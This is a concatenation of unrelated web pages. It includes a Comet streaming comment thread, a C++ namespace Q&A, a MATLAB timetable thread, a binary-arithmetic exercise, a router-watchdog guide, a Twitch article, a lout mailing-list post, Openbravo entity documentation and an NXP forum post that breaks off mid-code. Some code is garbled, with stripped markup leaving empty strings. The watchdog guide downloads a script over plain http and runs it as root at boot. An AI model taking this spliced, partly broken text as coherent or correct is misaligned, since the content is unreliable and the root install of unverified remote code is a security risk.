I know this question has been answered before (pset 3 "search": expected an exit code of 0, not 1), but I took a look at it, and the scenario in which that person asked the question is different from mine, even though it produces the same result: the position checked and the way the program runs are different. Why is this occurring? Code below:
bool search(int value, int values[], int n)
{
    //uses binary search to complete the problem
    //sets up running midpoint value and other values to control program
    int minimum = 0;
    int maximum = n - 1;
    int midpoint = minimum + ((minimum + maximum)/2);
    for (int i = 0; i <= n; i++)
    {
        if (n <= 0)
        {
            return false;
        }
        else
        {
            //sets up how the program acts in the events of each case
            //NOTE: If this happens, either you're lucky, or you deliberately set it up this way. Either way, good job! Partial credit to CS50's binary search video
            if (values[midpoint] == value)
            {
                return true;
            }
            //NOTE: If the rest happens, you're not so lucky, but ah well
            if (values[midpoint] > value)
            {
                maximum = maximum - 1;
                midpoint = minimum + ((minimum + maximum)/2);
            }
            if (values[midpoint] < value)
            {
                minimum = minimum + 1;
                midpoint = minimum + ((minimum + maximum)/2);
            }
        }
    }
    return false;
}
UPDATE: I'm now only receiving this error:
:( finds 42 in {40,41,42}
\ expected an exit code of 0, not 1
1 Answer
This code will never find anything unless value == midpoint. On each pass through the loop, it updates the min or the max, but it never updates midpoint. Since midpoint never changes, the loop will either find the value on the first pass at the midpoint, or the loop will just run to completion without ever finding value.
Side note: it would be more efficient to check if n<=0 just once, before the loop. Checking it on every pass through the loop is a waste after the first check.
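For reference, here is a minimal corrected version as a sketch: it checks `n` once before the loop and recomputes the midpoint from the updated bounds on every pass, which is the fix described above (variable names follow the question's code):

```c
#include <stdbool.h>

// Binary search over a sorted array values[0..n-1].
// Returns true if value is present, false otherwise.
bool search(int value, int values[], int n)
{
    if (n <= 0)
    {
        return false; // check once, before the loop
    }
    int minimum = 0;
    int maximum = n - 1;
    while (minimum <= maximum)
    {
        // Recompute the midpoint from the current bounds each pass.
        int midpoint = (minimum + maximum) / 2;
        if (values[midpoint] == value)
        {
            return true;
        }
        else if (values[midpoint] > value)
        {
            maximum = midpoint - 1; // discard the upper half
        }
        else
        {
            minimum = midpoint + 1; // discard the lower half
        }
    }
    return false;
}
```

Note that the bounds move to `midpoint - 1` and `midpoint + 1`, not by one element at a time, which is what makes the search logarithmic.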
If this answers your question, please click on the check mark to accept. Let's keep up on forum maintenance. ;-)
• Okay, I went ahead and added some code that should update the program, but for some reason, it still doesn't work. I'm going to update the code above. Commented Jul 23, 2016 at 5:02
• The updated code is mixing usage of min, mid and max. Sometimes, these vars are being used for the array indexes, other times, they are being used for the actual contents of array elements. You can't mix usage like that. They should strictly be used as indexes, not as array element values.
– Cliff B
Commented Jul 23, 2016 at 5:27
• Okay, based off the information you presented, I changed the following above. I'll show the code I changed. It still doesn't work but I did follow the instructions to the point where I'm only using something as an index. Commented Jul 23, 2016 at 5:57
• Worse. int minimum = values[0]; sets what should be an array index to the content of an array element. if (values > midpoint) tries to compare the entire array to what should be the index for the middle of the section of array being tested. I could go on, but you need to take some time and really look at the code and think about what the code is really doing and what it should do.
– Cliff B
Commented Jul 23, 2016 at 6:06
• I'll take a look at the code and come back to you tomorrow. Commented Jul 23, 2016 at 6:28
\overset{x = u^2}{=}
produces an equal sign with x = u^2 above it in a slightly smaller font size.
If I want to add y = v^2 above x = u^2 but with exactly the same font size, how do I do that? \overset{\overset{y = v^2}{x = u^2}}{=} does not work since y = v^2 becomes even smaller.
In addition to that, if possible, I would like all the equal signs to be displayed above each other symmetrically and not a bit to the left or right of each other.
I think you may be looking for the \substack command to "stack" y=v^2 above x=u^2.
\documentclass{article}
\usepackage{amsmath}
\begin{document}
\[
\overset{\substack{y=v^2\\x=u^2}}{=} \quad \overset{x=u^2}{=}
\]
\end{document}
Two Addenda: (i) To align the = symbols, use a few \phantoms. (ii) A slight [!] improvement is available by reducing the size of the overset material.
\documentclass{article}
\usepackage{amsmath}
\newcommand\xxx{\phantom{{}^2}} % a phantom that's as wide as a superscript "2"
\begin{document}
\[
\overset{\substack{\xxx y=v^2\\ \xxx x=u^2}}{=} \quad
\overset{ \xxx x=u^2}{=}
\]
\[
\overset{\substack{\scriptscriptstyle\xxx y=v^2\\[-1pt] \scriptscriptstyle\xxx x=u^2}}{=}
\quad\overset{\scriptscriptstyle \xxx x=u^2}{=}
\]
\end{document}
•
You got first. I didn't want to show the picture, I felt it was terrible even without seeing it.
– egreg
Dec 29 '16 at 17:00
•
This is a good answer. I dunno about you, but I feel like the offsetting of the equals sign, caused by the right hand side being wider than the left hand side, is a bit imperfect. Would it be possible to have all the = signs centred wrt each other?
– Au101
Dec 29 '16 at 17:02
•
@Au101 - I just posted an addendum to show how one might align the = symbols. :-)
– Mico
Dec 29 '16 at 17:07
• Thank you very much Mico, I greatly appreciate your help.
– David
Dec 29 '16 at 17:10
•
@Mico Thanks, I think that looks a little nicer :) And well done on all of that rep! :)
– Au101
Dec 29 '16 at 17:34
Done here with stacks and TABstacks. Vertical gaps from primary eqn (set here as 6pt) and between secondary eqns (set as 1pt) can be customized.
\documentclass{article}
\usepackage{tabstackengine}
\stackMath
\TABstackMath
\TABstackMathstyle{\scriptstyle}
\begin{document}
\[
\renewcommand\useanchorwidth{T}
y \stackon[6pt]{{}={}}{\alignstackon[1pt]{\mkern8mu x =& u^2}{y =& v^2}} mx + b
\]
\end{document}
A similar rendition may be obtained with
\[
\renewcommand\useanchorwidth{T}
\setstackgap{S}{1pt}
y \stackon[6pt]{{}={}}{\mkern7mu\alignShortstack{y =& v^2\\ x =& u^2}} mx + b
\]
Spring AOP, How does this example do it?
james frain
Finished this tutorial and have a problem grasping how or what advice code is called based on this configuration.
I understand the pointcut and when it will be called based on the pattern. I have done AOP examples before using annotations, and it was easy to see how and what code gets called for the advice. In this case, is some inbuilt advice being called? Or, if I wanted, how could I reconfigure it to call my own advice method?
http://static.springsource.org/docs/Spring-MVC-step-by-step/part6.html
Mark Spritzler
james frain wrote:Finished this tutorial and have a problem grasping how or what advice code is called based on this configuration.
I understand the pointcut and when it will be called based on the pattern. I have done AOP examples before using annotations, and it was easy to see how and what code gets called for the advice. In this case, is some inbuilt advice being called? Or, if I wanted, how could I reconfigure it to call my own advice method?
http://static.springsource.org/docs/Spring-MVC-step-by-step/part6.html
That is how you configure methods to be transactional in XML, versus just putting @Transactional on methods. The pointcut expression is there to get a proxy around any class that matches the advisor's pointcut expression. The <tx:advice> part tells which methods in those classes should be transactional and which settings besides the defaults should be set. Read the tx:method entries like exception handling, where the first match is used. So in ProductManager all methods are transactional, but any that start with save have all the defaults, and everything else has all the defaults with read-only set to true.
Hope that helps clear things up. It is all transaction configuration here, not standard self-made AOP: it is getting transactions with AOP using two namespaces.
This is a big reason why using annotations for transactions is so much easier than XML. But some people can't use annotations, so they have to use this approach.
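For comparison, the XML in that tutorial is roughly of this shape. This is a simplified sketch, not the tutorial's exact file; the bean id, package, and class names here are placeholders:

```xml
<!-- Advice: which methods are transactional, and with what settings.
     First matching tx:method wins, like exception handling. -->
<tx:advice id="txAdvice" transaction-manager="transactionManager">
    <tx:attributes>
        <tx:method name="save*"/>
        <tx:method name="*" read-only="true"/>
    </tx:attributes>
</tx:advice>

<!-- Pointcut: which classes get wrapped in a transactional proxy -->
<aop:config>
    <aop:pointcut id="productManagerOperation"
                  expression="execution(* example.ProductManager.*(..))"/>
    <aop:advisor advice-ref="txAdvice" pointcut-ref="productManagerOperation"/>
</aop:config>
```

To call your own advice instead of the built-in transaction interceptor, you would replace the `<tx:advice>` with an `<aop:aspect>` (or an advisor referencing your own advice bean) while keeping the same pointcut expression.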
Mark
• Post Reply
• Bookmark Topic Watch Topic
• New Topic
User Queries
If you have already registered your application, completed authentication, and generated a test user, the next step is learning how to work with users (sellers and buyers):
Contents
→ Query your personal data
→ Query third-party data
→ Get a user ID
→ Query public information
→ Query private information
→ Update user data
→ Seller with mandatory Mercado Pago
→ Common error codes
Query your personal data
If you have already logged in to Mercado Livre and have a token, you can make the following call to see the information associated with your user.
Example:
curl -X GET https://api.mercadolibre.com/users/me?access_token=$ACCESS_TOKEN
Response:
{
"id": 202593498,
"nickname": "TETE2870021",
"registration_date": "2016-01-06T11:31:42.000-04:00",
"first_name": "Test",
"last_name": "Test",
"country_id": "AR",
"email": "[email protected]",
"identification": {
"type": "DNI",
"number": "1111111"
},
"address": {
"state": "AR-C",
"city": "Palermo",
"address": "Test Address 123",
"zip_code": "1414"
},
"phone": {
"area_code": "01",
"number": "1111-1111",
"extension": "",
"verified": false
},
"alternative_phone": {
"area_code": "",
"number": "",
"extension": ""
},
"user_type": "real_estate_agency",
"tags": [
"real_estate_agency",
"test_user",
"user_info_verified"
],
"logo": null,
"points": 100,
"site_id": "MLA",
"permalink": "http://perfil.mercadolibre.com.ar/TETE2870021",
"shipping_modes": [
"custom",
"not_specified"
],
"seller_experience": "ADVANCED",
"seller_reputation": {
"level_id": null,
"power_seller_status": null,
"transactions": {
"period": "historic",
"total": 0,
"completed": 0,
"canceled": 0,
"ratings": {
"positive": 0,
"negative": 0,
"neutral": 0
}
}
},
"buyer_reputation": {
"canceled_transactions": 0,
"transactions": {
"period": "historic",
"total": null,
"completed": null,
"canceled": {
"total": null,
"paid": null
},
"unrated": {
"total": null,
"paid": null
},
"not_yet_rated": {
"total": null,
"paid": null,
"units": null
}
},
"tags": [
]
},
"status": {
"site_status": "active",
"list": {
"allow": true,
"codes": [
],
"immediate_payment": {
"required": false,
"reasons": [
]
}
},
"buy": {
"allow": true,
"codes": [
],
"immediate_payment": {
"required": false,
"reasons": [
]
}
},
"sell": {
"allow": true,
"codes": [
],
"immediate_payment": {
"required": false,
"reasons": [
]
}
},
"billing": {
"allow": true,
"codes": [
]
},
"mercadopago_tc_accepted": true,
"mercadopago_account_type": "personal",
"mercadoenvios": "not_accepted",
"immediate_payment": false,
"confirmed_email": false,
"user_type": "eventual",
"required_action": ""
},
"credit": {
"consumed": 100,
"credit_level_id": "MLA1"
}
}
Query third-party data
If you want to query other users' data, there are two levels of information: public data, which anyone can see by browsing another user's Mercado Livre profile (e.g. http://perfil.mercadolibre.com.ar/TETE2870021), and private data, which cannot be viewed unless you have the user's permission and a valid token to work on their behalf. In both cases, the first thing you need to know is the user's id.
Get a user ID
If you do not know the id, but you do know a user's nickname and the site they belong to, you can obtain their id with the following search.
Call:
https://api.mercadolibre.com/sites/{Site_id}/search?nickname={Nickname}
Example:
https://api.mercadolibre.com/sites/MLA/search?nickname=TETE2870021
Response:
{
"site_id": "MLA",
"seller": {
"id": 202593498,
"seller_reputation": {
"power_seller_status": null
},
"real_estate_agency": false,
"car_dealer": false,
"tags": [
]
},
"paging": {
"total": 2,
"offset": 0,
"limit": 50
},
"results": [
{
"id": "MLA598903377",
"site_id": "MLA",
"title": "Test Item - Nao Ofertar",
"subtitle": null,
"seller": {
"id": 202593498,
"power_seller_status": null,
"car_dealer": false,
"real_estate_agency": false,
"tags": [
]
},
"price": 200,
"currency_id": "ARS",
"available_quantity": 1,
"sold_quantity": 0,
"buying_mode": "buy_it_now",
"listing_type_id": "bronze",
"stop_time": "2016-03-06T17:16:49.000Z",
"condition": "new",
"permalink": "http://articulo.mercadolibre.com.ar/MLA-598903377-test-item-nao-ofertar-_JM",
"thumbnail": "http://mla-s2-p.mlstatic.com/546311-MLA20539702714_012016-I.jpg",
"accepts_mercadopago": true,
"installments": {
"quantity": 6,
"amount": 42.33,
"currency_id": "ARS"
},
"address": {
"state_id": "AR-C",
"state_name": "Capital Federal",
"city_id": "",
"city_name": "Palermo"
},
"shipping": {
"free_shipping": false,
"mode": "not_specified"
},
"seller_address": {
"id": 175597910,
"comment": "",
"address_line": "",
"zip_code": "",
"country": {
"id": "AR",
"name": "Argentina"
},
"state": {
"id": "AR-C",
"name": "Capital Federal"
},
"city": {
"id": "",
"name": "Palermo"
},
"latitude": -34.571148,
"longitude": -58.423298
},
"attributes": [
],
"original_price": null,
"category_id": "MLA374515",
"official_store_id": null
},
{
"id": "MLA599121050",
"site_id": "MLA",
"title": "Item De Test - No Ofertar",
"subtitle": null,
"seller": {
"id": 202593498,
"power_seller_status": null,
"car_dealer": false,
"real_estate_agency": false,
"tags": [
]
},
"price": 1000,
"currency_id": "ARS",
"available_quantity": 1,
"sold_quantity": 0,
"buying_mode": "buy_it_now",
"listing_type_id": "bronze",
"stop_time": "2016-03-07T20:12:41.000Z",
"condition": "new",
"permalink": "http://articulo.mercadolibre.com.ar/MLA-599121050-item-de-test-no-ofertar-_JM",
"thumbnail": "http://mla-s2-p.mlstatic.com/493311-MLA20538550251_012016-I.jpg",
"accepts_mercadopago": true,
"installments": {
"quantity": 6,
"amount": 211.65,
"currency_id": "ARS"
},
"address": {
"state_id": "AR-C",
"state_name": "Capital Federal",
"city_id": "",
"city_name": "Palermo"
},
"shipping": {
"free_shipping": false,
"mode": "not_specified"
},
"seller_address": {
"id": 175597910,
"comment": "",
"address_line": "",
"zip_code": "",
"country": {
"id": "AR",
"name": "Argentina"
},
"state": {
"id": "AR-C",
"name": "Capital Federal"
},
"city": {
"id": "",
"name": "Palermo"
},
"latitude": -34.571148,
"longitude": -58.423298
},
"attributes": [
],
"original_price": null,
"category_id": "MLA90105",
"official_store_id": null
}
],
"secondary_results": [
],
"related_results": [
],
"sort": {
"id": "relevance",
"name": "More relevant"
},
"available_sorts": [
{
"id": "price_asc",
"name": "Lower price"
},
{
"id": "price_desc",
"name": "Higher price"
}
],
"filters": [
],
"available_filters": [
{
"id": "category",
"name": "Categories",
"type": "text",
"values": [
{
"id": "MLA1648",
"name": "Computación",
"results": 1
},
{
"id": "MLA1430",
"name": "Ropa y Accesorios",
"results": 1
}
]
},
{
"id": "state",
"name": "Location",
"type": "text",
"values": [
{
"id": "TUxBUENBUGw3M2E1",
"name": "Capital Federal",
"results": 2
}
]
},
{
"id": "accepts_mercadopago",
"name": "MercadoPago filter",
"type": "boolean",
"values": [
{
"id": "yes",
"name": "With MercadoPago",
"results": 2
}
]
},
{
"id": "installments",
"name": "Pago",
"type": "text",
"values": [
{
"id": "yes",
"name": "Installments",
"results": 2
},
{
"id": "no_interest",
"name": "Sin interés",
"results": 0
}
]
},
{
"id": "condition",
"name": "Condition filter",
"type": "text",
"values": [
{
"id": "new",
"name": "New",
"results": 2
}
]
},
{
"id": "buying_mode",
"name": "Buying mode filter",
"type": "text",
"values": [
{
"id": "buy_it_now",
"name": "Buy it now",
"results": 2
}
]
},
{
"id": "has_pictures",
"name": "Items with images filter",
"type": "boolean",
"values": [
{
"id": "yes",
"name": "With pictures",
"results": 2
}
]
}
]
}
Query public information
Now that you know the user's id, you can call the users resource as follows to obtain the public information of any user you want.
Call:
curl -X GET https://api.mercadolibre.com/users/{User_id}
Example:
curl -X GET https://api.mercadolibre.com/users/202593498
Response:
{
"id": 202593498,
"nickname": "TETE2870021",
"registration_date": "2016-01-06T11:31:42.000-04:00",
"country_id": "AR",
"address": {
"state": "AR-C",
"city": "Palermo"
},
"user_type": "normal",
"tags": [
"normal",
"test_user",
"user_info_verified"
],
"logo": null,
"points": 100,
"site_id": "MLA",
"permalink": "http://perfil.mercadolibre.com.ar/TETE2870021",
"seller_reputation": {
"level_id": null,
"power_seller_status": null,
"transactions": {
"period": "historic",
"total": 0,
"completed": 0,
"canceled": 0,
"ratings": {
"positive": 0,
"negative": 0,
"neutral": 0
}
}
},
"buyer_reputation": {
"tags": []
},
"status": {
"site_status": "active"
}
}
Query the private information of a user who authorized your application
To obtain a user's private data, you only need to append the user's ACCESS_TOKEN to the end of the previous call. Call:
curl -X GET https://api.mercadolibre.com/users/{User_id}?access_token=$ACCESS_TOKEN
Example:
curl -X GET https://api.mercadolibre.com/users/202593498?access_token=$ACCESS_TOKEN
Response:
{
"id": 202593498,
"nickname": "TETE2870021",
"registration_date": "2016-01-06T11:31:42.000-04:00",
"first_name": "Test",
"last_name": "Test",
"country_id": "AR",
"email": "[email protected]",
"identification": {
"type": "DNI",
"number": "1111111"
},
"address": {
"state": "AR-C",
"city": "Palermo",
"address": "Test Address 123",
"zip_code": "1414"
},
"phone": {
"area_code": "01",
"number": "1111-1111",
"extension": "",
"verified": false
},
"alternative_phone": {
"area_code": "",
"number": "",
"extension": ""
},
"user_type": "normal",
"tags": [
"normal",
"test_user",
"user_info_verified"
],
"logo": null,
"points": 100,
"site_id": "MLA",
"permalink": "http://perfil.mercadolibre.com.ar/TETE2870021",
"shipping_modes": [
"custom",
"not_specified"
],
"seller_experience": "ADVANCED",
"seller_reputation": {
"level_id": null,
"power_seller_status": null,
"transactions": {
"period": "historic",
"total": 0,
"completed": 0,
"canceled": 0,
"ratings": {
"positive": 0,
"negative": 0,
"neutral": 0
}
}
},
"buyer_reputation": {
"canceled_transactions": 0,
"transactions": {
"period": "historic",
"total": null,
"completed": null,
"canceled": {
"total": null,
"paid": null
},
"unrated": {
"total": null,
"paid": null
},
"not_yet_rated": {
"total": null,
"paid": null,
"units": null
}
},
"tags": []
},
"status": {
"site_status": "active",
"list": {
"allow": true,
"codes": [],
"immediate_payment": {
"required": false,
"reasons": []
}
},
"buy": {
"allow": true,
"codes": [],
"immediate_payment": {
"required": false,
"reasons": []
}
},
"sell": {
"allow": true,
"codes": [],
"immediate_payment": {
"required": false,
"reasons": []
}
},
"billing": {
"allow": true,
"codes": []
},
"mercadopago_tc_accepted": true,
"mercadopago_account_type": "personal",
"mercadoenvios": "not_accepted",
"immediate_payment": false,
"confirmed_email": false,
"user_type": "eventual",
"required_action": ""
},
"credit": {
"consumed": 100,
"credit_level_id": "MLA1"
}
}
As you can see, this time you obtained a larger set of user data: first and last name, e-mail, phone, address, and so on. Please do not expose this data publicly, as that could harm the user.
Update user data
You can use our resources to update your user information after registration. This is usually needed because nothing at sign-up asks you to fill in your address or personal identification, but you must keep that information complete, or you will not be able to list products on Mercado Livre. To update your user information, see the example below:
curl -X PUT -H "Content-Type: application/json" -d
{
"identification_type": "DNI",
"identification_number": "33333333",
"address": "Triunvirato 5555",
"state":"AR-C",
"city":"Capital Federal",
"zip_dode": "1431",
"phone":{
"area_code":"011",
"number":"4444-4444",
"extension":"001"
},
"first_name":"Pedro",
"last_name": "Picapiedras",
"company":{
"corporate_name":"Acme",
"brand_name":"Acme Company"
},
"mercadoenvios": "accepted"
}
https://api.mercadolibre.com/users/{User_id}?access_token=$ACCESS_TOKEN
Congratulations! You have updated your user information! Remember to send only the fields you want to update.
Seller with mandatory Mercado Pago
If you want all of your transactions to go exclusively through Mercado Pago, you must indicate in your user information that you only accept that modality. This disables the "Arrange with the seller" option. PUT:
curl -X PUT -H "Content-type: application/json" -d
'{
"reason": "by_user"
}'
https://api.mercadolibre.com/users/{user_id}/immediate_payment?access_token=$ACCESS_TOKEN
If you no longer want Mercado Pago as the only accepted option, you can remove the flag as follows:
curl -XDELETE
'https://api.mercadolibre.com/users/{user_id}/immediate_payment/by_user?access_token=$ACCESS_TOKEN'
Common error codes
206 – Partial content: the Users API often returns a 206 – Partial content code. This happens when the request for some of the data fails (for example, the user's reputation), indicating that you are receiving an incomplete response.
Next:
Official Stores.
|
__label__pos
| 0.99724 |
Template Selectors Overview
What is a Template Selector?
The DataTemplateSelector provides a way to apply data templates based on custom logic.
Typically, you use a template selector when you have more than one data template defined for the same type of objects. For example, use it if your binding source is a list of student objects and you want to apply a particular template to the part-time students. You can do this by creating a class that inherits from DataTemplateSelector and by overriding the SelectTemplate() method. Once your class is defined you can assign an instance of the class to the template selector property of your element.
For more information, you can check the DataTemplateSelector Class msdn article.
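A minimal sketch of such a selector follows. The `Student` class, its `IsPartTime` property, and the template property names are illustrative assumptions, not from the article; only `DataTemplateSelector` and the `SelectTemplate(object, DependencyObject)` override are part of WPF itself:

```csharp
using System.Windows;
using System.Windows.Controls;

// Hypothetical binding-source type for this example.
public class Student
{
    public string Name { get; set; }
    public bool IsPartTime { get; set; }
}

// Picks a template based on whether a Student is part-time.
public class StudentTemplateSelector : DataTemplateSelector
{
    // Typically assigned in XAML from resources.
    public DataTemplate FullTimeTemplate { get; set; }
    public DataTemplate PartTimeTemplate { get; set; }

    public override DataTemplate SelectTemplate(object item, DependencyObject container)
    {
        if (item is Student student && student.IsPartTime)
        {
            return PartTimeTemplate;
        }
        return FullTimeTemplate;
    }
}
```

You would then assign an instance of `StudentTemplateSelector` to, for example, a list control's `ItemTemplateSelector` property.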
Polynomial Expressions
• Topic: Sentence, Equals sign, Expression
• Published : January 29, 2013
1. Which expression is not a polynomial? (Points: 3)
Option A: [pic]
Option B: 5
Option C: 3x^3 + 5x − 4
Option D: [pic]
2. Use the polynomial to answer the question.
12x^3 + 5 − 5x^2 − 6x^2 + 3x^3 + 2 − x
Which expresses the polynomial in standard form? ...
IE ActiveX("htmlfile") Transport, Part II
by Michael Carter, November 18th, 2007
In my last post I discussed using the ActiveX("htmlfile") technique to provide a usable streaming transport in Internet Explorer. The solution I provided will work, but since writing the last article I've made significant progress in understanding why IE behaves the way it does with respect to the streaming transport.
The previous solution amounted to creating an array of messages, pushing messages on that array from the htmlfile iframe, and popping messages off of the array in the parent window, and processing them. Here is the function we use to create that solution:
function connect_htmlfile(url, callback) {
    var transferDoc = new ActiveXObject("htmlfile");
    transferDoc.open();
    transferDoc.write(
        "<html><script>" +
        "document.domain='" + document.domain + "';" +
        "</script></html>");
    transferDoc.close();
    var ifrDiv = transferDoc.createElement("div");
    transferDoc.body.appendChild(ifrDiv);
    ifrDiv.innerHTML = "<iframe src='" + url + "'></iframe>";
    var messageQueue = [];
    transferDoc.messageQueue = messageQueue;
    var check_for_msgs = function() {
        // Drain the queue in arrival order, handing each message
        // to the callback.
        while (messageQueue.length > 0) {
            var msg = messageQueue.shift();
            callback(msg);
        }
    }
    // Check for updates ten times a second.
    setInterval(check_for_msgs, 100);
}
In the iframe:
<script>parent.messageQueue.push("arbitrary data")</script>
So this does indeed work, albeit with a performance hit for the callback, as well as an added worst-case 100 ms delay for each event. This is not ideal, but at least it works. Unfortunately, what wasn’t adequately explained in my previous article was why it works.
Well, I have the answer in this article. I was prompted to investigate when I received a message on the Orbited mailing list from “Ufo” explaining that it is unnecessary to push messages into a queue and de-queue them later. In fact, the htmlfile transport can be used almost identically to the standard iframe transport. This is the way I originally attempted to implement this transport, and I encountered the premature htmlfile closing issue, so I was a bit surprised by the news. Here is the working (I tested it) code suggested by Ufo on the mailing list:
function connect_htmlfile(url, callback) {
    var transferDoc = new ActiveXObject("htmlfile");
    transferDoc.open();
    transferDoc.write(
        "<html><script>" +
        "document.domain='" + document.domain + "';" +
        "</script></html>");
    transferDoc.close();
    var ifrDiv = transferDoc.createElement("div");
    transferDoc.body.appendChild(ifrDiv);
    ifrDiv.innerHTML = "<iframe src='" + url + "'></iframe>";
    transferDoc.callback = callback;
    setInterval(function () {}, 10000);
}
In the iframe:
<script>parent.callback("arbitrary data")</script>
The last line in connect_htmlfile creates a timer that operates every ten seconds and does absolutely nothing. With this line added, the transport suddenly works. Without it, we have the same problems as before. So my original solution worked because of the setInterval, not because of appending messages to a queue. But it seems to make no sense that a timer which does nothing will magically cause the ActiveX("htmlfile") connection not to close. I was perplexed by this until I started digging deeper.
Let’s start with the answer. This is a problem of garbage collection. The reason it works is because that last line creates an anonymous function that forms a closure over the scope in which transferDoc was originally defined. Without this closure, there is no reference to transferDoc so its marked by the garbage collector for deletion. The garbage collector doesn’t do its job immediately though. Rather, it operates after a specified interval of instructions on DOM objects. Actually, I believe the garbage collector for JavaScript objects is different than that for DOM objects, so you can do plenty of JavaScript-only manipulations without causing the garbage collection process to occur.
The new code looks like this:
function connect_htmlfile(url, callback) {
    // ... Same stuff as before ...
    dummy = function() {}
}
This will solve the problem without the setInterval, because we’re still creating a closure around the scope of transferDoc. But this causes a different problem, as first experienced by Andrew Betts and explained in the same mailing thread: once the user navigates away from the page, the htmlfile persists.
The cause of this requires a brief bit of background. In IE there are various methods of causing memory leaks. Normally that’s not a huge deal—the user ends up with a few hundred kilobytes of memory missing, but life goes on. Clearly it isn’t ideal, but neither is it fatal. However, when a live HTTP connection (the htmlfile’s iframe) fails to be garbage collected, we have a huge problem. Not only does it waste server resources to send events to a nonexistent page, it also wreaks havoc on any application logic trying to detect disconnects (for instance, a Comet chat application might want to send a “user has departed” message). Even worse though is that the user will quickly run into the two-connection-per-server limit to the Comet server.
The final solution is very simple. Remember Alex Russell’s original code for the htmlfile transport? We can use it almost exactly, if we remove the var from the transferDoc assignment. The code looks like this:
function connect_htmlfile(url, callback) {
    // no more 'var transferDoc...'
    transferDoc = new ActiveXObject("htmlfile");
    transferDoc.open();
    transferDoc.write(
        "<html><script>" +
        "document.domain='" + document.domain + "';" +
        "</script></html>");
    transferDoc.close();
    var ifrDiv = transferDoc.createElement("div");
    transferDoc.body.appendChild(ifrDiv);
    ifrDiv.innerHTML = "<iframe src='" + url + "'></iframe>";
    transferDoc.callback = callback;
}
And then for the iframe code:
<script>parent.callback(["arbitrary", "data", ["goes", "here"]]);</script>
By leaving the page we lose all references to transferDoc and it is thus marked for garbage collection. But surprisingly, navigating away doesn’t always immediately close the connection. The issue is that the garbage collection doesn’t happen right away. This is perfectly fine for data structures that we no longer need, but it is unacceptable for a live HTTP connection to remain open for an unspecified time after the user has left.
The solution is to create an onunload function. The function does two things:
1. Remove the reference to transferDoc
2. Explicitly call the garbage collector
function htmlfile_close() {
    transferDoc = null;
    CollectGarbage();
}
Gotchas
Any additional references to transferDoc will need to be deleted before CollectGarbage() will actually close the connection. This isn’t as easy to avoid as you might think. In Orbited we still declare transferDoc as var transferDoc = … but then we attach it to the Orbited object: Orbited.transferDoc = transferDoc. The htmlfile_close function would set Orbited.transferDoc = null before garbage collection. But this failed to close the htmlfile connection! The reason was that we had created an additional and unrelated anonymous function defined in the same scope as transferDoc. This function kept a reference to the transferDoc, and even though the function never interacted with transferDoc at all, it was still never closed.
Strangely enough, even if you lose or even explicitly remove all references to the anonymous function that encloses the transferDoc variable’s scope, and all references to transferDoc are elsewhere removed, garbage collection still fails to close the connection.
Thanks
Special thanks to Andrew Betts and Ufo/Camka for discussing the problem in depth on the Orbited mailing list.
19 Responses to "IE ActiveX("htmlfile") Transport, Part II"
1. Dave Says:
Hi Michael,
Great article, I’ve a question slightly off topic. You mention the nightmare of memory leaks - what method(s) do you employ to find and solve them? e.g. I use Drip and although according to drip there are no leaks (no dom element leaks) in the stuff I write, I see memory consumption rising on every page refresh.
Any pointers would be appreciated.
Cheers,
Dave
5. Jamie Taleyarkhan Says:
Really nice article, and a good explanation. But when I try it, the callback is undefined.
If my PHP/CGI flushes the following: alert(typeof parent.callback);
we discover the callback is undefined. As per your article, this shouldn't be the case.
Is it something to do with the version of htmlfile ActiveX?
any ideas? thx
6. Jamie Taleyarkhan Says:
ah ok got it:
transferDoc.parentWindow is the object which is referenced as parent in the ActiveX htmlfile.
cheers,
7. panlong Says:
htmlfile error '80004005'
in vbs
8. Tim Says:
I’m running into the same problem as Jamie, but have no idea what his reply means. When I try to reference the callback method, I get:
Object doesn’t support this property or method.
parent.callback is not defined. Any suggestions?
9. Greg Houston Says:
Although this is an old article, I think many would benefit if a working demo was available for download. The example code could just be a basic html file with the JavaScript in it, and a server side PHP file that updated the page with a new timestamp once a second.
I am only able to get a single response from the PHP. As soon as I add a loop with flush and sleep in the PHP nothing happens. Then about twenty minutes later I get a single response. I’m assuming something timed out. Basically the data isn’t streaming. The PHP file is being treated like an ordinary non-streaming document.
10. Eric Waldheim Says:
Using this method I get about 10 seconds of msgs and then it stops working.
When I add the trick Meteor uses to register the callback into the iframe (from meteor.js):
register: function(ifr) {
ifr.p = Meteor.process;
Then message reception continues without interruption.
So I am unconvinced that the technique explained here is the whole story.
Thank you very much for posting this, it was extremely helpful.
11. Tim Says:
4 months later, I FINALLY got this working! Here’s what Jamie was so cryptically trying to say. The line:
transferDoc.callback = callback;
needs to be changed to read:
transferDoc.parentWindow.callback = callback;
Make that one little change, and you go from the maddening code posted in this article that does nothing but generate a javascript error, to a workable solution. :)
12. snotling Says:
Has anyone managed to get this mechanism working in a cross domain setup?
i.e. loading the iframe from a totally different website than the “top” document.
The “document.domain” trick only works for sub-domains unfortunately. So I’ve been running into “Permission denied” issues so far…
I saw references on the Web about the URL fragment identifier hack, but I’m using pieces of information which would be too large to fit in for a start.
Thanks guys!
13. Rahul Vartak Says:
Hi All,
I'm facing a problem wherein I have an HTML page with an IFRAME in it.
This IFRAME loads an HTML page which has ActiveX Controls in it.
As the default IE settings prevent an ActiveX Control from loading (i.e. it shows you a typical security message asking you to allow ActiveX before loading the entire page), I'm not able to see the ActiveX-enabled content in the IFRAME.
Is there any way in which i can allow ActiveX Controls to run by default?
14. Kyle Says:
This post just saved my life. I am using the Meteor Server (meteorserver.org) for real-time chat on our Ajax site. Everything worked fine in FF, and seemed to work with IE. But when I would refresh the page while the streaming connection was active, I would continuously get an “Object doesn’t support this property or method” error. The strange thing is that, while it was spitting out this error over and over, if I was in another application and the IE window was behind the application I was using (and not minimized), it would bring the IE window back to the front! I mainly noticed this while in IE8’s developer mode, but I also noticed it affecting my other applications in other strange ways. Adding an onunload event containing “Meteor.frameref = null; CollectGarbage();” fixed the problem. In the case of Meteor server, “Meteor.frameref” was equivalent to the “transferDoc” variable. Thanks a lot!
15. Manh Le Says:
Hi,
I figured out how to overcome the permission denied problem.
the part involving document.domain should be changed from
transferDoc.write(
  "" +
  "document.domain='" + document.domain + "';" +
  "");
to something like this:
var http = [];
http.push("http://");
http.push(document.domain);
transferDoc.write(
  "" +
  "document.domain='" + http.join("") + "';" +
  "");
BTW: it won't work if you just use your testing environment, such as the Visual Studio local web host; I had to test my work through a real internet address.
Last thing, don't forget to change the thing as Tim suggested above.
Still, I have one question: how to solve the problem when the user clicks the STOP button in the browser? For IE with this htmlfile solution it works perfectly, but in other browsers the comet connection will be disconnected.
16. Quora Says:
